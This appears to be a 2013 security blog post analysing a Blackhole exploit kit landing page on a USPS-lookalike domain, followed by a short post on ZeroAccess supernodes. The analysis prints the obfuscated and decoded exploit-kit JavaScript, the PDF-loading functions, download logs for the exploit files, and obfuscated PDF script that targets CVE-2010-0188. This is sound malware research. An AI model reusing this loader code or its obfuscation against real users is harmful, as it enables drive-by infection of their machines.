Tuesday, February 26, 2013

BHEK 2 plugin detect 0.7.9

BHEK 2.x with Plugin detect 0.7.9


I saw a tweet for a Virustotal 0/45 and a urlquery.net link so I got curious:

At first glance this looks like a BHEK case to me. This is my first real go at analyzing  BHEK so bare with me...

The url from urlquery: hxxp://www5-usps.com/nbh/sends/track.php resolving to 46.166.179.122
Virustotal report 0/31

Lets go and fetch it:

--2013-02-26 23:53:55--  hxxp://www5-usps.com/nbh/sends/track.php
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 22:58:09 GMT
  Content-Type: text/html
  Connection: close
  X-Powered-By: PHP/5.4.12
Length: unspecified [text/html]
Saving to: `track.php'

     0K .......... .......... .......... .......... ..........  196K
    50K .......... .......... .......... .......... .......... 74.3K
   100K .........                                              1.09M=0.9s

2013-02-26 23:53:58 (117 KB/s) - `track.php' saved [112216]

This gives us a page with obfuscated JavaScript on it: 

(Full page at pastebin)
 language="javascript">var a = "112:1OO:112:1OO:61:123:11(:1O1:114:115:1O5:111:11O:5(:34:4(:46:55:46:57:34:44:11O:97:1O9:1O1:5(:34:112:1OO:112:1OO:34:44:1O4:97:11O:1OO:1O(:1O1:114:5(:1O2:117:11O:99:116:1O5:111:11O:4O:99:44:9(:44:97:41:123:114:1O1:116:117:114:11O:32:1O2:117:11O:99:116:1O5:111:11O:4O:41:123:99:4O:9(:44:97:41:125:125:44:111:112:1O1:11O:(4:97:1O3:5(:34:6O:34:44:1O5:115:6(:1O1:1O2:1O5:11O:1O1:1OO:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:33:61:34:117:11O:1OO:1O1:1O2:1O5:11O:1O1:1OO:34:125:44:1O5:115:65:114:114:97:121:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:47:97:114:114:97:121:47:1O5:41:46:116:1O1:115:116:4O:79:9(:1O6:1O1:99:116:46:112:114:111:116:111:116:121:112:1O1:46:116:111:(3:116:114:1O5:11O:1O3:46:99:97:1O(:1O(:4O:9(:41:41:125:44:1O5:115:7O:117:11O:99:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:1O2:117:11O:99:116:1O5:111:11O:34:125:44:1O5:115:(3:116:114:1O5:11O:1O3:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:125:44:1O5:115:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:11O:117:1O9:9(:1O1:114:34:125:44:1O5:115:(3:116:114:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:3(:3(:4O:47:92:1OO:47:41:46:116:1O1:115:116:4O:9(:41:41:125:44:1O3:1O1:116:7(:117:1O9:(2:1O1:1O3:12O:5(:47:91:92:1OO:93:91:92:1OO:92:46:92:95:44:45:93:42:47:44:115:112:1O(:1O5:116:7(:117:1O9:
:
:

Lets run it through jsbeautifier.org to clean it up: 

(Fully beautified page at pastebin)
if (window.document)
            function c() {
                for (i = 0, s = ""; i < a.length; i++) {
                    s += String["f" + "r" + "o" + "mCh" + "arC" + ff](a[i]);
                }
            }
            if (window.document) csq = function () {
                z(s);
            };
            try {
                document.body ^= 2
            } catch (q) {
                xc = 1;
                if (q) e = eval;
                rr = "rep" + "la" + "ce";
                doc = document;
            }
            try {
                doc["body"] %= 2
            } catch (q) {
                ff = "ode";
            }
            try {
                gewh = 1;
            } catch (sav) {
                xc = false;
            }
            vvz = "\\(";
        
       
        
            var a = "112:100:112:100:61:123:11(:101:114:115:105:111

Decoding this will give us the following most interseting parts:  

wepawet link

Hello plugin detect 0.7.9

pdpd = {
    version: "O.7.9",
    name: "pdpd",
    handler: function(c, b, a) {
        return function() {
            c(b, a)
        }
:
:

function x(s) {
    d = [];
    for (i = O; i < s.length; i++) {
        k = (s.charCodeAt(i)).toString(33);
        d.push(k);
    };
    return d.join(":");
}
:
:

function j1() {
    return true;
}
function j2() {
    return true;
}
function p1() {
    var d = document.createElement("object");
    d.setAttribute("data", "/nbh/sends/track.php?wxgnkiyn=" + x("8fa62") + "&ynis=" + x("ymg") + "&sspcu=3O:3O:33:1k:1h:31:2v:1n:1l:1h&pie=" + x(pdfver.join(".")));
    d.setAttribute("type", "application/pdf");
    document.body.appendChild(d);
}
function p2() {
    var d = document.createElement("object");
    d.setAttribute("data", "/nbh/sends/track.php?zaigqae=" + x("8fa62") + "&xtdgebs=" + x("j") + "&qbthq=3O:3O:33:1k:1h:31:2v:1n:1l:1h&yphqibh=" + x(pdfver.join(".")));
    d.setAttribute("type", "application/pdf");
    document.body.appendChild(d);
}
function p3() {
    return false;
}
function f1() {
    var oSpan = document.createElement("span");
    document.body.appendChild(oSpan);
    var url = "/nbh/sends/track.php?pbf=" + x("8fa62") + "&jsttgj=" + x("nikbgp") + "&gbtov=3O:3O:33:1k:1h:31:2v:1n:1l:1h&info=O2e6b1525353caa8ad5555554daf57575452ac31b4b5afb531bOaa5534b73153ac55533O36b4ac51b252ca3556b1cf4f7e7af15O6acc";
    oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-44455354OOOO' id='asd' width='6OO' height='4OO' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='" + url + "' /><embed src='" + url + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
function ff2() {
    return false;
}
:
:

We have now the functions that makes the calls for the PDF's and Flash files.

There is little obfuscation left now, so by running the x() function to get output the missing strings, we can now get the full URL's needed to fetch the PDF files and the Flash file. These parameters are needed to get the files that will exploit out client.


Lets fetch the exploit files:


Adobe 8.0 as input to p1():

MD5: 8410e4eb83d2c12ae56edd8aab9ef139
Virustotal report 21/46

--2013-02-27 00:01:47--  hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:06:04 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Accept-Ranges: bytes
  Content-Length: 9874
  Content-Disposition: inline; filename=c516a.pdf
Length: 9874 (9.6K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l'

     0K .........                                             100%  114K=0.08s


2013-02-27 00:01:52 (114 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' saved [9874/9874]


Adobe 8.0 as input to p1():

--2013-02-27 00:14:32--  hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:18:49 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Content-Length: 20065
  ETag: "c6c16a19dfb3210cd8d680eef3a24429"
  Last-Modified: Tue, 26 Feb 2013 23:17:43 GMT
  Accept-Ranges: bytes
Length: 20065 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f'

     0K .......... .........                                  100% 91.2K=0.2s

2013-02-27 00:14:37 (91.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' saved [20065/20065]


Adobe 8.1 as input to p1():

--2013-02-27 00:15:39--  hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:19:59 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Content-Length: 20053
  ETag: "e03b272d4c3f1b6dd29e5ae5c4e69c28"
  Last-Modified: Tue, 26 Feb 2013 23:18:52 GMT
  Accept-Ranges: bytes
Length: 20053 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g'

     0K .......... .........                                  100%  117K=0.2s

2013-02-27 00:15:47 (117 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' saved [20053/20053]


Adobe 7.0 as input to p1():

--2013-02-27 00:19:33--  hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:23:49 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Content-Length: 20041
  ETag: "dca06b8cac6d323ef4819ebb35713352"
  Last-Modified: Tue, 26 Feb 2013 23:22:43 GMT
  Accept-Ranges: bytes
Length: 20041 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f'

     0K .......... .........                                  100% 88.2K=0.2s

2013-02-27 00:19:37 (88.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' saved [20041/20041]


Adobe 8.0 as input to p2():

MD5: 4bd05eb8bb678618fc3d54ed53ec66b2
Virustotal report 21/46
--2013-02-27 00:23:46--  hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:27:59 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Accept-Ranges: bytes
  Content-Length: 10838
  Content-Disposition: inline; filename=6ed41.pdf
Length: 10838 (11K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f'

     0K ..........                                            100% 83.6K=0.1s

2013-02-27 00:23:47 (83.6 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' saved [10838/10838]


Adobe 9.0 as input to p2():

MD5: 50b9fb749ec9226be53ed108667c2e19
Virustotal report 21/46
--2013-02-27 00:26:30--  hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:30:53 GMT
  Content-Type: application/pdf
  Connection: keep-alive
  X-Powered-By: PHP/5.4.12
  Accept-Ranges: bytes
  Content-Length: 10815
  Content-Disposition: inline; filename=7453e.pdf
Length: 10815 (11K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f'

     0K ..........                                            100%  123K=0.09s

2013-02-27 00:26:41 (123 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' saved [10815/10815]



Flash f1():

MD5: db2d3584fdbacdb7fd58fadc558144ae
Virustotal report 10/46





--2013-02-27 00:31:24--  hxxp://www5-usps.com/nbh/sends/track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Server: nginx/0.7.67
  Date: Tue, 26 Feb 2013 23:35:43 GMT
  Content-Type: text/html
  Connection: close
  X-Powered-By: PHP/5.4.12
Length: unspecified [text/html]
Saving to: `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc'

     0K ..                                                      121M=0s

2013-02-27 00:31:32 (121 MB/s) - `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' saved [2671]

Happy to get the files :) but no time to analyze them further at the time :(

Update 2013-02-28

I got time to look more into this case and lets start looking into the PDFs:

Lets see if the files hide something we could look more into,
c516a.pdf:

statistics:
Comment: 4
XREF: 1
Trailer: 0
StartXref: 0
Indirect object: 26
  11: 52, 6, 18, 19, 20, 21, 22, 28, 31, 32, 48
 /Annot 1: 15
 /Catalog 1: 1
 /EmbeddedFile 6: 41, 42, 99999, 44, 45, 46
 /Font 3: 14, 27, 29
 /FontDescriptor 1: 30
 /Page 1: 8
 /Pages 1: 2
 /Pattern 1: 13

lets look more into object 99999


obj 99999 0
Type: /EmbeddedFile
 Referencing: 
 Contains stream
 <</Length
1313 / Filter / FlateDecode / Type / EmbeddedFile >>

<< /Length 1313
   /Filter / FlateDecode / Type / EmbeddedFile >>

< template > < subform name = "form1"
layout = "tb"
locale = "ru_RU" > < pageSet > < pageArea > < contentArea h = "10.5in"
w = "8in"
x = "0.25in"
y = "0.25in" > < /contentArea><medium long="11in" short="8.5in" stock="letter"></medium > < /pageArea></pageSet > < subform h = "10.5in"
w = "8in" > < field h = "98.425mm"
name = "ImageField1"
w = "28.575mm"
x = "95.25mm"
y = "19.05mm" > < ui > < imageEdit > < /imageEdit></ui > < event activity = "initialize"
xmlns: xfa = "http://testset.com" > < xfa: script contentType = 'application/x-javascript' > p = parseIn & #116;;
a= & quot;
53 * * ^ !@# * * 48 * * 4P * * 1L * * 4N * * ^ !@# * * 48 * * 4B * * 4B * * 4G * * ^ !@# * * 4L * * 4E * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 49 * * ^ !@# * * 49 * * 49 * * 27 * * 1L * * ^ !@# * * 4A * * 4A * * 4A * * 27 * * ^ !@# * * 1L * * 4B * * 4B * * 4B * * ^ !@# * * 27 * * 1L * * 4C * * 4C * * ^ !@# * * 4C * * 27 * * 1L * * 4D * * ^ !@# * * 4D * * 4D * * 27 * * 1L * * ^ !@# * * 4E * * 4E * * 4E * * 27 * * ^ !@# * * 1L * * 4F * * 4F * * 4F * * ^ !@# * * 2M * * 53 * * 48 * * 4P * * ^ !@# * * 1L * * 4N * * 4M * * 4G * * ^ !@# * * 4L * * 51 * * 4C * * 4P * * ^ !@# * * 50 * * 46 * * 48 * * 27 * * ^ !@# * * 1L * * 4G * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 55 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 56 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 46 * * ^ !@# * * 4J * * 2C * * 2O * * 1N * * ^ !@# * * 2F * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2G * * 2C * * 2I * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 4D * * 2H * * 2E * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 48 * * 2E * * 4C * * 49 * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 2B * * 2D * * 2B * * ^ !@# * * 2J * * 2D * * 2F * * 48 * * ^ !@# * * 2H * * 4C * * 2D * * 4D * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2D * * 2H * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2C * * 2D * * 2E * * 2K * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2H * * 2F * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2B * * 2B * * 2F * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 1N * * 26 * * 1N * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 4D * * ^ !@# * * 2H * * 49 * * 2H * * 4B * * ^ !@# * * 2H * * 2K * * 2I * * 2C * * ^ !@# * * 2H * * 4B * * 2E * * 2G * * ^ !@# * * 2I * * 2K * * 2I * * 2B * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2I * * 2C * * 2I * * 2D * * ^ !@# * * 2I * * 2H * * 2H * * 2C * * ^ !@# * * 2H * * 48 * * 2H * * 4B * * ^ !@# * * 2E * * 2H * * 2I * * 2F * * ^ !@# * * 2H * * 2F * * 2H * * 4C * * ^ !@# * * 2H * * 4D * * 2H * * 2H * * ^ !@# * * 2D * * 2K * * 2H * * 2C * * ^ !@# * * 2E * * 4B * * 2E * * 2C * * ^ !@# * * 2I * * 2E * * 2I * * 2E * * ^ !@# * * 2H * * 4C * * 2H * * 2J * * ^ !@# * * 2H * * 2D * * 2H * * 2H * * ^ !@# * * 2D * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4C * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2H * * ^ !@# * * 2I * * 2D * * 2E * * 48 * * ^ !@# * * 2E * * 2C * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2J * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 49 * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2E * * ^ !@# * * 2E * * 2E * * 2E * * 48 * * ^ !@# * * 2E * * 2B * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2B * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 2F * * 2I * * 2B * * ^ !@# * * 2I * * 2I * * 2H * * 48 * * ^ !@# * * 2H * * 2E * * 2I * * 2F * * ^ !@# * * 2I * * 2B * * 2I * * 2J * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4A * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2D * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 4B * * 2H * * 2E * * ^ !@# * * 2H * * 48 * * 2I * * 4D * * ^ !@# * * 2E * * 2B * * 2I * * 2J * * ^ !@# * * 2H * * 2B * * 2I * * 4C * * ^ 
:
:
a = a.replace.apply(a, [/\^!@#/g, & quot; & quot;]);
a = a.replace.apply(a, [/\*\*/g, & quot; & quot;]);
s = [];
for (i = 0; i & lt; a. & #108;ength;i+= 2) {
    s.push(p(a. & #115;ubstr(i,2),26)-15);
}
ss= String. & #102;romCharCode;
if(event.target.info.Authors= == null) if (event.target.filesize & gt;
    (16000, 9000)) {
        k = ss.apply(String, s);
        q = "e" + ss.apply(String, [0x76, 0x61]);
        event.target[q + "l"]( & #107;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>



Pretty ugly stuff here: JavaScript which tries to use CVE 2010-0188.
After exploiting the client it will try to fetch additional payload from

hxxp://www5-usps.com/nbh/sends/track.php?jggg=32:1h:1l:1l:1j&ccb=30:30:33:1k:1h:31:2v:1n:1l:1h&qjqjo=1i&madrmk=fsjuhw&aazds=seyv

Since I left this alone for a couple of days the site was, as expected, not serving me anything anymore so no additional pyload for me.

WepaWet report here


The same method was used for the other PDFs:


6ed41.pdf -> WebaWet
7453e.pdf -> WepAwet


No Java?

I had expected som Java stuff to hit me from the EK as well.  But since I went straight for the plugin detect stuff, I missed this code:


<applet code="&#OO1O4;&#OO119;" archive="/nbh/sends/track.php">
            <param value="Dyy3Ojj" name="val" />
            <param value="fa" name="earth" />
            <param name="prime" value="___4mKi3iw%tOjo?DjieoMijylV%qw3D3xA.b1hO6DO6-O6-O6CRVeb1fO1fO11O6qO6DO16OhvO6oO6-O6DRCb6.RVObqRAlb-" />
        </applet>

Too late to fetch the jar as well.

Wednesday, February 20, 2013

Zeroaccess supernodes mapped - part I

Zeroaccess supernodes part I


NB! there are approximately 40.000 nodes so the mapping will be slow

Or it should have been, but my google_maps_api_javascript fu failed me and you just get a small taste plotted on the nice google maps.
However here is the full list at pastebin part_I and part_II

This is an overview of ZeroAccess supernodes tracked in the last three weeks.
These nodes have been online during this period and confirmed infected.

These are nodes that are the backbone of the ZeroAccess network who other bots contact to keep updated. These nodes also communicate with each other mainly on UDP port 16464. They are called supernodes due to the fact that other nodes can communicate with them.

For more info on ZeroAccess check this post

Please note that IP addresses do change over time so some of these might not be alive at the time of publishing.

A good source for ZeroAccess statistics over at malware-lu